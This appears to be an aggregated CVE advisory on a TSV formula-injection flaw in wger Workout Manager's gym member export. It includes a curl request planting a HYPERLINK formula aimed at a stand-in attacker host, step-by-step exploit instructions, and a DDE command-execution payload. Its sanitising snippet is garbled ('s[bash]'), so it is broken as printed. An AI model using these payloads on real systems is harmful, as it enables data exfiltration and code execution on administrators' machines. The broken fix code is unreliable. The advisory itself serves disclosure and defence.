Listen to this Post
The vulnerability is a CSV/TSV formula injection (CWE-1236) in wger Workout Manager. The gym member TSV export endpoint writes `first_name` and `last_name` profile fields verbatim to TSV cells. The export function uses Python’s `csv.writer` which does not escape spreadsheet formula triggers. These triggers include ‘=’, ‘+’, ‘-‘, ‘@’, ‘\t’, and ‘\r’. Any gym member can set their `first_name` or `last_name` to a malicious formula. The profile edit endpoint allows storing arbitrary strings without sanitization. The formula is stored in the database and reproduced in every subsequent TSV export. When a gym admin later exports the member list and opens the file in Excel, LibreOffice Calc, or Google Sheets, the formula executes. The formula executes in the admin’s local spreadsheet context. This allows data exfiltration via `HYPERLINK` or `WEBSERVICE` functions. On legacy Excel with DDE enabled, arbitrary local code execution is possible using payloads like =cmd|'/c calc.exe'!A1. The vulnerable code is in `wger/gym/views/export.py` at approximately line 73. The affected endpoint is GET /en/gym/export/users/<gym_pk>. The recommended fix is to prepend a single quote to any cell value beginning with a formula trigger. The OWASP-recommended mitigation is to sanitize all user-supplied fields before exporting.
DailyCVE Form
Platform: wger Workout Manager
Version: latest (Docker)
Vulnerability: Formula Injection
Severity: High
date: April 28 2026
Prediction: May 28 2026
What Undercode Say:
Inject formula payload into profile curl -X POST "http://target/en/user/1/overview" \ -H "Cookie: sessionid=member_session" \ -d "first_name=%3DHYPERLINK%28%22http%3A%2F%2Fattacker.example%2Fx%3Fp%3D%22%26A1%2C%22click%22%29"
Vulnerable code in wger/gym/views/export.py (line 73)
writer.writerow([
user.id,
gym.name,
user.username,
user.email,
user.first_name, written verbatim - no sanitization
user.last_name, written verbatim
...
])
Mitigation: sanitize cell values
FORMULA_PREFIXES = ('=', '+', '-', '@', '\t', '\r')
def sanitise_cell(value):
s = str(value) if value is not None else ''
if s and s[bash] in FORMULA_PREFIXES:
return "'" + s
return s
writer.writerow([
...
sanitise_cell(user.first_name),
sanitise_cell(user.last_name),
...
])
Exploit:
- As a gym member, set `first_name` to a formula like
=HYPERLINK("http://attacker.com/x?p="&A1,"click"). - Wait for a gym admin to export the member list via
GET /en/gym/export/users/<gym_pk>. - The exported TSV contains the formula in the `first_name` column for that member.
- When the admin opens the TSV in Excel, the formula executes, sending data to the attacker.
Protection from this CVE
- Apply the `sanitise_cell` function to all user-supplied fields before exporting.
- Upgrade to the latest patched version of wger when available.
- Open TSV exports in a text editor instead of a spreadsheet application.
- Disable DDE (Dynamic Data Exchange) in legacy Excel installations.
Impact
- Data Exfiltration: Adjacent PII can be sent to an attacker-controlled server.
- Local Code Execution: Arbitrary commands can be run on the admin’s workstation (legacy Excel).
- Phishing: Admins can be redirected to attacker-controlled sites.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
